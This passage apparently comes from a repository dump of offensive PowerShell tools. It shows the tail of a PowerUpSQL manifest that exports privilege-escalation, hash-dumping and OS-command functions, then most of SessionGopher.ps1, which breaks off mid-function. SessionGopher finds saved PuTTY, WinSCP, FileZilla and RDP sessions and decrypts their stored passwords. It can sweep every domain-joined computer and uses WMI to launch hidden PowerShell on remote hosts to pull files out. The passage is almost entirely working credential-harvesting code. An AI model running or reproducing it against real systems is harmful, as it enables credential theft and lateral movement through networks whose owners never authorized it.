'Get-SQLColumnSampleDataThreaded', \n        'Get-SQLConnectionTest', \n        'Get-SQLConnectionTestThreaded', \n        'Get-SQLDatabase', \n        'Get-SQLDatabasePriv', \n        'Get-SQLDatabaseRole', \n        'Get-SQLDatabaseRoleMember', \n        'Get-SQLDatabaseSchema', \n        'Get-SQLDatabaseThreaded', \n        'Get-SQLDatabaseUser', \n        'Get-SQLFuzzDatabaseName', \n        'Get-SQLFuzzDomainAccount', \n        'Get-SQLFuzzObjectName', \n        'Get-SQLFuzzServerLogin'                                                                                                                                    \n        'Get-SQLInstanceDomain', \n        'Get-SQLInstanceFile', \n        'Get-SQLInstanceLocal', \n        'Get-SQLInstanceScanUDP', \n        'Get-SQLInstanceScanUDPThreaded', \n        'Get-SQLLocalAdminCheck',\n        'Get-SQLQuery', \n        'Get-SQLQueryThreaded', \n        'Get-SQLRecoverPwAutoLogon',\n        'Get-SQLServerConfiguration',\t\n        'Get-SQLServerCredential', \n        'Get-SQLServerInfo', \n        'Get-SQLServerInfoThreaded', \n        'Get-SQLServerLink', \n        'Get-SQLServerLinkCrawl',\n        'Get-SQLServerLinkData',\n        'Get-SQLServerLinkQuery',\n        'Get-SQLServerLogin', \n        'Get-SQLServerLoginDefaultPw', \n        'Get-SQLServerPasswordHash',\n        'Get-SQLServerPriv', \n        'Get-SQLServerRole', \n        'Get-SQLServerRoleMember', \n        'Get-SQLServiceAccount', \n        'Get-SQLServiceLocal', \n        'Get-SQLSession', \n        'Get-SQLStoredProcedure', \n        'Get-SQLStoredProcedureSQLi',        \n        'Get-SQLStoredProcedureAutoExec',          \n        'Get-SQLSysadminCheck', \n        'Get-SQLTable', \n        'Get-SQLTriggerDdl', \n        'Get-SQLTriggerDml', \n        'Get-SQLView', \n        'Invoke-SQLAudit', \n        'Invoke-SQLAuditPrivCreateProcedure',\t\n        'Invoke-SQLAuditPrivDbChaining', \n        'Invoke-SQLAuditPrivImpersonateLogin', \n        'Invoke-SQLAuditPrivServerLink', \n        'Invoke-SQLAuditPrivTrustworthy', \n        'Invoke-SQLAuditPrivXpDirtree', \n        'Invoke-SQLAuditPrivXpFileexit', \n        'Invoke-SQLAuditRoleDbDdlAdmin', \n        'Invoke-SQLAuditRoleDbOwner', \n        'Invoke-SQLAuditSampleDataByColumn', \n        'Invoke-SQLAuditWeakLoginPw', \n        'Invoke-SQLAuditSQLiSpExecuteAs',    \n        'Invoke-SQLAuditSQLiSpSigned',  \n        'Invoke-SQLAuditDefaultLoginPw',    \n        'Invoke-SQLAuditPrivAutoExecSp',     \n        'Invoke-SQLDumpInfo', \n        'Invoke-SQLEscalatePriv', \n        'Invoke-SQLImpersonateService',\n        'Invoke-SQLImpersonateServiceCmd',\n        'Invoke-SQLOSCmd',\n        'Invoke-SQLOSCmdCLR',\n        'Invoke-TokenManipulation'\n    )\n    FileList          = 'PowerUpSQL.psm1', 'PowerUpSQL.ps1', 'README.md'\n}\n\n"
  },
  {
    "path": "modules/PowerUpSQL.psm1",
    "content": "Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {\n    . $_.FullName\n}\n"
  },
  {
    "path": "modules/SessionGopher.ps1",
    "content": "<#\n  .SYNPOSIS\n  Extracts and decrypts saved session information for software typically used to access Unix systems.\n\n  .DESCRIPTION\n  Queries HKEY_USERS for PuTTY, WinSCP, and Remote Desktop saved sessions. Decrypts saved passwords for WinSCP.\n  Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.\n  In Thorough mode, identifies PuTTY private key (.ppk), Remote Desktop Connection (.rdp), and RSA token (.sdtid) files, and extracts private key and session information.\n  Can be run remotely using the -iL (supply input list of computers) or -AllDomain (run against all AD-joined computers) flags.\n  Must either provide credentials (-u and -p for username and password) of an admin on target boxes, or run script in the context of\n  a privileged user on the target boxes, in which case no credentials are needed.\n\n  .Notes\n  Author: Brandon Arvanaghi\n  Date:   February 17, 2017\n  Thanks: \n    Brice Daniels, Pan Chan - collaborating on idea\n    Christopher Truncer - helping with WMI\n\n  .PARAMETER o\n  Generates CSV output.\n    \n  .PARAMETER Thorough\n  Searches entire filesystem for certain file extensions.\n\n  .PARAMETER u\n  Domain\\username (e.g. superduper.com\\a-jerry).\n\n  .PARAMETER p\n  Password for domain user (if username provided).\n    \n  .PARAMETER iL\n  If you want to supply a list of hosts to run SessionGopher against, provide the path to that file here. Each host should be separated by a newline in the file.\n\n  .PARAMETER Target\n  If you only want to run SessionGopher against once specific host.\n    \n  .PARAMETER AllDomain\n  Queries Active Direcotry for a list of all domain-joined computers and runs SessionGopher against all of them.\n#>\nfunction Invoke-SessionGopher {\n  param (\n      [switch]$o, # Generate CSV output\n      [switch]$Thorough, # Searches entire filesystem for certain file extensions\n      [string]$u, # Domain\\username (e.g. superduper.com\\a-jerry)\n      [string]$p, # Password of domain account\n      [string]$iL, # A file of hosts to run SessionGopher against remotely, each host separated by a newline in the file\n      [string]$Target, # If you want to run SessionGopher against one specific host\n      [switch]$AllDomain # Run across all active directory\n  )\n\n  Write-Output '\n          o_       \n         /  \".   SessionGopher\n       ,\"  _-\"      \n     ,\"   m m         \n  ..+     )      Brandon Arvanaghi\n     `m..m       Twitter: @arvanaghi | arvanaghi.com\n  '\n\n  if ($o) {\n    $OutputDirectory = \"SessionGopher (\" + (Get-Date -Format \"HH.mm.ss\") + \")\"\n    New-Item -ItemType Directory $OutputDirectory | Out-Null\n    New-Item ($OutputDirectory + \"\\PuTTY.csv\") -Type File | Out-Null\n    New-Item ($OutputDirectory + \"\\SuperPuTTY.csv\") -Type File | Out-Null\n    New-Item ($OutputDirectory + \"\\WinSCP.csv\") -Type File | Out-Null\n    New-Item ($OutputDirectory + \"\\FileZilla.csv\") -Type File | Out-Null\n    New-Item ($OutputDirectory + \"\\RDP.csv\") -Type File | Out-Null\n    if ($Thorough) {\n        New-Item ($OutputDirectory + \"\\PuTTY ppk Files.csv\") -Type File | Out-Null\n        New-Item ($OutputDirectory + \"\\Microsoft rdp Files.csv\") -Type File | Out-Null\n        New-Item ($OutputDirectory + \"\\RSA sdtid Files.csv\") -Type File | Out-Null\n    }\n  }\n\n  if ($u -and $p) {\n    $Password = ConvertTo-SecureString $p -AsPlainText -Force\n    $Credentials = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList $u, $Password\n  }\n\n  # Value for HKEY_USERS hive\n  $HKU = 2147483651\n  # Value for HKEY_LOCAL_MACHINE hive\n  $HKLM = 2147483650\n\n  $PuTTYPathEnding = \"\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\"\n  $WinSCPPathEnding = \"\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions\"\n  $RDPPathEnding = \"\\SOFTWARE\\Microsoft\\Terminal Server Client\\Servers\"\n\n  if ($iL -or $AllDomain -or $Target) {\n\n    # Whether we read from an input file or query active directory\n    $Reader = \"\"\n\n    if ($AllDomain) {\n      $Reader = GetComputersFromActiveDirectory\n    } elseif ($iL) { \n      $Reader = Get-Content ((Resolve-Path $iL).Path)\n    } elseif ($Target) {\n      $Reader = $Target\n    }\n\n    $optionalCreds = @{}\n    if ($Credentials) {\n      $optionalCreds['Credential'] = $Credentials\n    }\n\n    foreach ($RemoteComputer in $Reader) {\n\n      if ($AllDomain) {\n        # Extract just the name from the System.DirectoryServices.SearchResult object\n        $RemoteComputer = $RemoteComputer.Properties.name\n        if (!$RemoteComputer) { Continue }\n      }\n\n      Write-Host -NoNewLine -ForegroundColor \"DarkGreen\" \"[+] \"\n      Write-Host \"Digging on\" $RemoteComputer\"...\"\n\n      $SIDS = Invoke-WmiMethod -Class 'StdRegProv' -Name 'EnumKey' -ArgumentList $HKU,'' -ComputerName $RemoteComputer @optionalCreds | Select-Object -ExpandProperty sNames | Where-Object {$_ -match 'S-1-5-21-[\\d\\-]+$'}\n\n      foreach ($SID in $SIDs) {\n\n        # Get the username for SID we discovered has saved sessions\n        $MappedUserName = try { (Split-Path -Leaf (Split-Path -Leaf (GetMappedSID))) } catch {}\n        $Source = (($RemoteComputer + \"\\\" + $MappedUserName) -Join \"\")\n\n        # Created for each user found. Contains all sessions information for that user. \n        $UserObject = New-Object PSObject\n\n        <#\n        PuTTY: contains hostname and usernames\n        SuperPuTTY: contains username, hostname, relevant protocol information, decrypted passwords if stored\n        RDP: contains hostname and username of sessions\n        FileZilla: hostname, username, relevant protocol information, decoded passwords if stored\n        WinSCP: contains hostname, username, protocol, deobfuscated password if stored and no master password used\n        #>\n        $ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList\n        $ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList\n        $ArrayOfRDPSessions = New-Object System.Collections.ArrayList\n        $ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList\n        $ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList\n\n        # Construct tool registry/filesystem paths from SID or username\n        $RDPPath = $SID + $RDPPathEnding\n        $PuTTYPath = $SID + $PuTTYPathEnding\n        $WinSCPPath = $SID + $WinSCPPathEnding\n        $SuperPuTTYFilter = \"Drive='C:' AND Path='\\\\Users\\\\$MappedUserName\\\\Documents\\\\SuperPuTTY\\\\' AND FileName='Sessions' AND Extension='XML'\"\n        $FileZillaFilter = \"Drive='C:' AND Path='\\\\Users\\\\$MappedUserName\\\\AppData\\\\Roaming\\\\FileZilla\\\\' AND FileName='sitemanager' AND Extension='XML'\"\n\n        $RDPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$RDPPath @optionalCreds\n        $PuTTYSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$PuTTYPath @optionalCreds\n        $WinSCPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$WinSCPPath @optionalCreds\n        $SuperPuTTYPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $SuperPuTTYFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)\n        $FileZillaPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $FileZillaFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)\n\n        # If any WinSCP saved sessions exist on this box...\n        if (($WinSCPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {\n\n          # Get all sessions\n          $WinSCPSessions = $WinSCPSessions | Select-Object -ExpandProperty sNames\n          \n          foreach ($WinSCPSession in $WinSCPSessions) {\n      \n            $WinSCPSessionObject = \"\" | Select-Object -Property Source,Session,Hostname,Username,Password\n            $WinSCPSessionObject.Source = $Source\n            $WinSCPSessionObject.Session = $WinSCPSession\n\n            $Location = $WinSCPPath + \"\\\" + $WinSCPSession\n\n            $WinSCPSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,\"HostName\" @optionalCreds).sValue\n            $WinSCPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,\"UserName\" @optionalCreds).sValue\n            $WinSCPSessionObject.Password = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,\"Password\" @optionalCreds).sValue\n\n            if ($WinSCPSessionObject.Password) {\n\n              $MasterPassPath = $SID + \"\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security\"\n          \n              $MasterPassUsed = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetDWordValue -ArgumentList $HKU,$MasterPassPath,\"UseMasterPassword\" @optionalCreds).uValue\n              \n              if (!$MasterPassUsed) {\n                  $WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)\n              } else {\n                  $WinSCPSessionObject.Password = \"Saved in session, but master password prevents plaintext recovery\"\n              }\n\n            }\n             \n            [void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)\n      \n          } # For Each WinSCP Session\n\n          if ($ArrayOfWinSCPSessions.count -gt 0) {\n\n            $UserObject | Add-Member -MemberType NoteProperty -Name \"WinSCP Sessions\" -Value $ArrayOfWinSCPSessions\n\n            if ($o) {\n              $ArrayOfWinSCPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\WinSCP.csv\") -NoTypeInformation\n            } else {\n              Write-Host -NoNewline \"WinSCP Sessions\"\n              $ArrayOfWinSCPSessions | Select-Object * | Format-List | Out-String\n            }\n\n          }\n        \n        } # If path to WinSCP exists\n\n        if (($PuTTYSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {\n\n          # Get all sessions\n          $PuTTYSessions = $PuTTYSessions | Select-Object -ExpandProperty sNames\n\n          foreach ($PuTTYSession in $PuTTYSessions) {\n      \n            $PuTTYSessionObject = \"\" | Select-Object -Property Source,Session,Hostname\n\n            $Location = $PuTTYPath + \"\\\" + $PuTTYSession\n\n            $PuTTYSessionObject.Source = $Source\n            $PuTTYSessionObject.Session = $PuTTYSession\n            $PuTTYSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,\"HostName\" @optionalCreds).sValue\n             \n            [void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)\n      \n          }\n\n          if ($ArrayOfPuTTYSessions.count -gt 0) {\n\n            $UserObject | Add-Member -MemberType NoteProperty -Name \"PuTTY Sessions\" -Value $ArrayOfPuTTYSessions\n\n            if ($o) {\n              $ArrayOfPuTTYSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\PuTTY.csv\") -NoTypeInformation\n            } else {\n              Write-Host -NoNewline  \"PuTTY Sessions\"\n              $ArrayOfPuTTYSessions | Select-Object * | Format-List | Out-String\n            }\n\n          }\n\n        } # If PuTTY session exists\n\n        if (($RDPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {\n\n          # Get all sessions\n          $RDPSessions = $RDPSessions | Select-Object -ExpandProperty sNames\n\n          foreach ($RDPSession in $RDPSessions) {\n      \n            $RDPSessionObject = \"\" | Select-Object -Property Source,Hostname,Username\n            \n            $Location = $RDPPath + \"\\\" + $RDPSession\n\n            $RDPSessionObject.Source = $Source\n            $RDPSessionObject.Hostname = $RDPSession\n            $RDPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,\"UserNameHint\" @optionalCreds).sValue\n\n            [void]$ArrayOfRDPSessions.Add($RDPSessionObject)\n      \n          }\n\n          if ($ArrayOfRDPSessions.count -gt 0) {\n\n            $UserObject | Add-Member -MemberType NoteProperty -Name \"RDP Sessions\" -Value $ArrayOfRDPSessions\n\n            if ($o) {\n              $ArrayOfRDPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + \"\\RDP.csv\") -NoTypeInformation\n            } else {\n              Write-Host -NoNewline  \"Microsoft RDP Sessions\"\n              $ArrayOfRDPSessions | Select-Object * | Format-List | Out-String\n            }\n\n          }\n\n        } # If RDP sessions exist\n\n        # If we find the SuperPuTTY Sessions.xml file where we would expect it\n        if ($SuperPuTTYPath.Name) {\n\n          $File = \"C:\\Users\\$MappedUserName\\Documents\\SuperPuTTY\\Sessions.xml\"\n          $FileContents = DownloadAndExtractFromRemoteRegistry $File\n\n          [xml]$SuperPuTTYXML = $FileContents\n          (ProcessSuperPuTTYFile $SuperPuTTYXML)\n\n        }\n\n        # If we find the FileZilla sitemanager.xml file where we would expect it\n        if ($FileZillaPath.Name) {\n\n          $File = \"C:\\Users\\$MappedUserName\\AppData\\Roaming\\FileZilla\\sitemanager.xml\"\n          $FileContents = DownloadAndExtractFromRemoteRegistry $File\n\n          [xml]$FileZillaXML = $FileContents\n          (ProcessFileZillaFile $FileZillaXML)\n\n        } # FileZilla\n\n      } # for each SID\n\n      if ($Thorough) {\n\n        $ArrayofPPKFiles = New-Object System.Collections.ArrayList\n        $ArrayofRDPFiles = New-Object System.Collections.ArrayList\n        $ArrayofsdtidFiles = New-Object System.Collections.ArrayList\n\n        $FilePathsFound = (Get-WmiObject -Class 'CIM_DataFile' -Filter \"Drive='C:' AND extension='ppk' OR extension='rdp' OR extension='.sdtid'\" -ComputerName $RemoteComputer @optionalCreds | Select Name)\n\n        (ProcessThoroughRemote $FilePathsFound)\n        \n      } \n\n    } # for each remote computer\n\n  # Else, we run SessionGopher locally\n  } else { \n    \n    Write-Host -NoNewLine -ForegroundColor \"DarkGreen\" \"[+] \"\n    Write-Host \"Digging on\"(Hostname)\"...\"\n\n    # Aggregate all user hives in HKEY_USERS into a variable\n    $UserHives = Get-ChildItem Registry::HKEY_USERS\\ -ErrorAction SilentlyContinue | Where-Object {$_.Name -match '^HKEY_USERS\\\\S-1-5-21-[\\d\\-]+$'}\n\n    # For each SID beginning in S-15-21-. Loops through each user hive in HKEY_USERS.\n    foreach($Hive in $UserHives) {\n\n      # Created for each user found. Contains all PuTTY, WinSCP, FileZilla, RDP information. \n      $UserObject = New-Object PSObject\n\n      $ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList\n      $ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList\n      $ArrayOfPPKFiles = New-Object System.Collections.ArrayList\n      $ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList\n      $ArrayOfRDPSessions = New-Object System.Collections.ArrayList\n      $ArrayOfRDPFiles = New-Object System.Collections.ArrayList\n      $ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList\n\n      $objUser = (GetMappedSID)\n      $Source = (Hostname) + \"\\\" + (Split-Path $objUser.Value -Leaf)\n\n      $UserObject | Add-Member -MemberType NoteProperty -Name \"Source\" -Value $objUser.Value\n\n      # Construct PuTTY, WinSCP, RDP, FileZilla session paths from base key\n      $PuTTYPath = Join-Path $Hive.PSPath \"\\$PuTTYPathEnding\"\n      $WinSCPPath = Join-Path $Hive.PSPath \"\\$WinSCPPathEnding\"\n      $MicrosoftRDPPath = Join-Path $Hive.PSPath \"\\$RDPPathEnding\"\n      $FileZillaPath = \"C:\\Users\\\" + (Split-Path -Leaf $UserObject.\"Source\") + \"\\AppData\\Roaming\\FileZilla\\sitemanager.xml\"\n      $SuperPuTTYPath = \"C:\\Users\\\" + (Split-Path -Leaf $UserObject.\"Source\") + \"\\Documents\\SuperPuTTY\\Sessions.xml\"\n\n      if (Test-Path $FileZillaPath) {\n\n        [xml]$FileZillaXML = Get-Content $FileZillaPath\n        (ProcessFileZillaFile $FileZillaXML)\n\n      }\n\n      if (Test-Path $SuperPuTTYPath) {\n\n        [xml]$SuperPuTTYXML = Get-Content $SuperPuTTYPath\n        (ProcessSuperPuTTYFile $SuperPuTTYXML)\n\n      }\n\n      if (Test-Path $MicrosoftRDPPath) {\n\n        # Aggregates all saved sessions from that user's RDP client\n        $AllRDPSessions = Get-ChildItem $MicrosoftRDPPath\n\n        (ProcessRDPLocal $AllRDPSessions)\n\n      } # If (Test-Path MicrosoftRDPPath)\n\n      if (Test-Path $WinSCPPath) {\n\n        # Aggregates all saved sessions from that user's WinSCP client\n        $AllWinSCPSessions = Get-ChildItem $WinSCPPath\n\n        (ProcessWinSCPLocal $AllWinSCPSessions)\n\n      } # If (Test-Path WinSCPPath)\n      \n      if (Test-Path $PuTTYPath) {\n\n        # Aggregates all saved sessions from that user's PuTTY client\n        $AllPuTTYSessions = Get-ChildItem $PuTTYPath\n\n        (ProcessPuTTYLocal $AllPuTTYSessions)\n\n      } # If (Test-Path PuTTYPath)\n\n    } # For each Hive in UserHives\n\n    # If run in Thorough Mode\n    if ($Thorough) {\n\n      # Contains raw i-node data for files with extension .ppk, .rdp, and sdtid respectively, found by Get-ChildItem\n      $PPKExtensionFilesINodes = New-Object System.Collections.ArrayList\n      $RDPExtensionFilesINodes = New-Object System.Collections.ArrayList\n      $sdtidExtensionFilesINodes = New-Object System.Collections.ArrayList\n\n      # All drives found on system in one variable\n      $AllDrives = Get-PSDrive\n\n      (ProcessThoroughLocal $AllDrives)\n      \n      (ProcessPPKFile $PPKExtensionFilesINodes)\n      (ProcessRDPFile $RDPExtensionFilesINodes)\n      (ProcesssdtidFile $sdtidExtensionFilesINodes)\n\n    } # If Thorough\n\n  } # Else -- run SessionGopher locally\n\n} # Invoke-SessionGopher\n\n####################################################################################\n####################################################################################\n## Registry Querying Helper Functions\n####################################################################################\n####################################################################################\n\n# Maps the SID from HKEY_USERS to a username through the HKEY_LOCAL_MACHINE hive\nfunction GetMappedSID {\n\n  # If getting SID from remote computer\n  if ($iL -or $Target -or $AllDomain) {\n    # Get the username for SID we discovered has saved sessions\n    $SIDPath = \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\$SID\"\n    $Value = \"ProfileImagePath\"\n\n    return (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM,$SIDPath,$Value @optionalCreds).sValue\n  # Else, get local SIDs\n  } else {\n    # Converts user SID in HKEY_USERS to username\n    $SID = (Split-Path $Hive.Name -Leaf)\n    $objSID = New-Object System.Security.Principal.SecurityIdentifier(\"$SID\")\n    return $objSID.Translate( [System.Security.Principal.NTAccount])\n  }\n\n}\n\nfunction DownloadAndExtractFromRemoteRegistry($File) {\n  # The following code is taken from Christopher Truncer's WMIOps script on GitHub. It gets file contents through WMI by\n  # downloading the file's contents to the remote computer's registry, and then extracting the value from that registry location\n  $fullregistrypath = \"HKLM:\\Software\\Microsoft\\DRM\"\n  $registrydownname = \"ReadMe\"\n  $regpath = \"SOFTWARE\\Microsoft\\DRM\"\n          \n  # On remote system, save file to registry\n  Write-Verbose \"Reading remote file and writing on remote registry\"\n  $remote_command = '$fct = Get-Content -Encoding byte -Path ''' + \"$File\" + '''; $fctenc = [System.Convert]::ToBase64String($fct); New-ItemProperty -Path ' + \"'$fullregistrypath'\" + ' -Name ' + \"'$registrydownname'\" + ' -Value $fctenc -PropertyType String -Force'\n  $remote_command = 'powershell -nop -exec bypass -c \"' + $remote_command + '\"'\n\n  $null = Invoke-WmiMethod -class win32_process -Name Create -Argumentlist $remote_command -ComputerName $RemoteComputer @optionalCreds\n\n  # Sleeping to let remote system read and store file\n  Start-Sleep -s 15\n\n  $remote_reg = \"\"\n\n  # Grab file from remote system's registry\n  $remote_reg = Invoke-WmiMethod -Namespace 'root\\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM, $regpath, $registrydownname -Computer $RemoteComputer @optionalCreds\n  \n  $decoded = [System.Convert]::FromBase64String($remote_reg.sValue)\n  $UTF8decoded = [System.Text.Encoding]::UTF8.GetString($decoded) \n    \n  # Removing Registry value from remote system\n  $null = Invoke-WmiMethod -Namespace 'root\\default' -Class 'StdRegProv' -Name 'DeleteValue' -Argumentlist $reghive, $regpath, $registrydownname -ComputerName $RemoteComputer @optionalCreds\n  \n  return $UTF8decoded\n\n}\n\n####################################################################################\n####################################################################################\n## File Processing Helper Functions\n####################################################################################\n####################################################################################\n\nfunction ProcessThoroughLocal($AllDrives) {\n  \n  foreach ($Drive in $AllDrives) {\n    # If the drive holds a filesystem\n    if ($Drive.Provider.Name -eq \"FileSystem\") {\n      $Dirs = Get-ChildItem $Drive.Root -Recurse -ErrorAction SilentlyContinue\n      foreach ($Dir in $Dirs) {\n        Switch ($Dir.Extension) {\n          \".ppk\" {[void]$PPKExtensionFilesINodes.Add($Dir)}\n          \".rdp\" {[void]$RDPExtensionFilesINodes.Add($Dir)}\n          \".sdtid\" {[void]$sdtidExtensionFilesINodes.Add($Dir)}\n        }\n      }\n    }\n  }\n\n}\n\nfunction ProcessThoroughRemote($FilePathsFound) {\n\n  foreach ($FilePath in $FilePathsFound) {\n      # Each object we create for the file extension found from a -Thorough search will have the same properties (Source, Path to File)\n      $ThoroughObject = \"\" | Select-Object -Property Source,Path\n      $ThoroughObject.Source = $RemoteComputer\n\n      $Extension = [IO.Path]::GetExtension($FilePath.Name)\n\n      if ($Extension -eq \".ppk\") {\n        $ThoroughObject.Path = $FilePath.Name\n        [void]$ArrayofPPKFiles.Add($ThoroughObject)\n      } elseif ($Extension -eq \".rdp\") {\n        $ThoroughObject.Path = $FilePath.Name\n        [void]$ArrayofRDPFiles.Add($ThoroughObject)\n      } elseif ($Extension -eq \".sdtid\") {\n        $ThoroughObject.Path = $FilePath.Name\n        [void]$ArrayofsdtidFiles.Add($ThoroughObject)\n      }\n\n  }\n\n  if ($ArrayOfPPKFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"PPK Files\" -Value $ArrayOfRDPFiles\n\n    if ($o) {\n      $ArrayOfPPKFiles | Export-CSV -Append -Path ($OutputDirectory + \"\\PuTTY ppk Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"PuTTY Private Key Files (.ppk)\"\n      $ArrayOfPPKFiles | Format-List | Out-String\n    }\n  }\n\n  if ($ArrayOfRDPFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"RDP Files\" -Value $ArrayOfRDPFiles\n\n    if ($o) {\n      $ArrayOfRDPFiles | Export-CSV -Append -Path ($OutputDirectory + \"\\Microsoft rdp Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"Microsoft RDP Connection Files (.rdp)\"\n      $ArrayOfRDPFiles | Format-List | Out-String\n    }\n  }\n  if ($ArrayOfsdtidFiles.count -gt 0) {\n\n    $UserObject | Add-Member -MemberType NoteProperty -Name \"sdtid Files\" -Value $ArrayOfsdtidFiles\n\n    if ($o) {\n      $ArrayOfsdtidFiles | Export-CSV -Append -Path ($OutputDirectory + \"\\RSA sdtid Files.csv\") -NoTypeInformation\n    } else {\n      Write-Host -NoNewline \"RSA Tokens (sdtid)\"\n      $ArrayOfsdtidFiles | Format-List | Out-String\n    }\n\n  }\n\n} # ProcessThoroughRemote\n\nfunction ProcessPuTTYLocal($AllPuTTYSessions) {\n  \n  # For each PuTTY saved session, extract the information we want \n  foreach($Session in $AllPuTTYSessions) {\n\n    $PuTTYSessionObject = \"\" | Select-Object -Property Source,Session,Hostname\n\n    $PuTTYSessionObject.Source = $Source\n    $PuTTYSessionObject.Session = (Split-Path $Session -Leaf)\n    $PuTTYSessionObject.Hostname = ((Get-ItemProperty -Path (\"Microsoft.PowerShell.Core\\Registry::\" + $Session) -Name \"Hostname\" -ErrorAction SilentlyContinue).Hostname)\n\n    # ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.\n    [void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)\n\n  }\n\n  if ($o) {\n    $ArrayOfPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + \"\\PuTTY.csv\") -NoTypeInformation\n  } else {\n    Write-Host -NoNewline \"PuTTY Sessions\"\n    $ArrayOfPuTTYSessions | Format-List | Out-String\n  }\n\n  # Add the array of PuTTY session objects to UserObject\n  $UserObject | Add-Member -MemberType NoteProperty -Name \"PuTTY Sessions\" -Value $ArrayOfPuTTYSessions\n\n} # ProcessPuTTYLocal\n\nfunction ProcessRDPLocal($AllRDPSessions) {\n\n  # For each RDP saved session, extract the information we want\n  foreach($Session in $AllRDPSessions) {\n\n    $PathToRDPSession = \"Microsoft.PowerShell.Core\\Registry::\" + $Session\n\n    $MicrosoftRDPSessionObject = \"\" | Select-Object -Property Source,Hostname,Username\n\n    $MicrosoftRDPSessionObject.Source = $Source\n    $MicrosoftRDPSessionObject.Hostname = (Split-Path $Session -Leaf)\n    $MicrosoftRDPSessionObject.Username = ((Get-ItemProperty -Path $PathToRDPSession -Name \"UsernameHint\" -ErrorAction SilentlyContinue).UsernameHint)\n\n    # ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.\n    [void]$ArrayOfRDPSessions.Add($MicrosoftRDPSessionObject)\n\n  } # For each Session in AllRDPSessions\n\n  if ($o) {\n    $ArrayOfRDPSessions | Export-CSV -Append -Path ($OutputDirectory + \"\\RDP.csv\") -NoTypeInformation\n  } else {\n    Write-Host -NoNewline \"Microsoft Remote Desktop (RDP) Sessions\"\n    $ArrayOfRDPSessions | Format-List | Out-String\n  }\n\n  # Add the array of RDP session objects to UserObject\n  $UserObject | Add-Member -MemberType NoteProperty -Name \"RDP Sessions\" -Value $ArrayOfRDPSessions\n\n} #ProcessRDPLocal\n\nfunction ProcessWinSCPLocal($AllWinSCPSessions) {\n  \n  # For each WinSCP saved session, extract the information we want\n  foreach($Session in $AllWinSCPSessions) {\n\n    $PathToWinSCPSession = \"Microsoft.PowerShell.Core\\Registry::\" + $Session\n\n    $WinSCPSessionObject = \"\" | Select-Object -Property Source,Session,Hostname,Username,Password\n\n    $WinSCPSessionObject.Source = $Source\n    $WinSCPSessionObject.Session = (Split-Path $Session -Leaf)\n    $WinSCPSessionObject.Hostname = ((Get-ItemProperty -Path $PathToWinSCPSession -Name \"Hostname\" -ErrorAction SilentlyContinue).Hostname)\n    $WinSCPSessionObject.Username = ((Get-ItemProperty -Path $PathToWinSCPSession -Name \"Username\" -ErrorAction SilentlyContinue).Username)\n    $WinSCPSessionObject.Password = ((Get-ItemProperty -Path $PathToWinSCPSession -Name \"Password\" -ErrorAction SilentlyContinue).Password)\n\n    if ($WinSCPSessionObject.Password) {\n      $MasterPassUsed = ((Get-ItemProperty -Path (Join-Path $Hive.PSPath \"SOFTWARE\\Martin Prikryl\\WinSCP 2\\Configuration\\Security\") -Name \"UseMasterPassword\" -ErrorAction SilentlyContinue).UseMasterPassword)\n\n      # If the user is not using a master 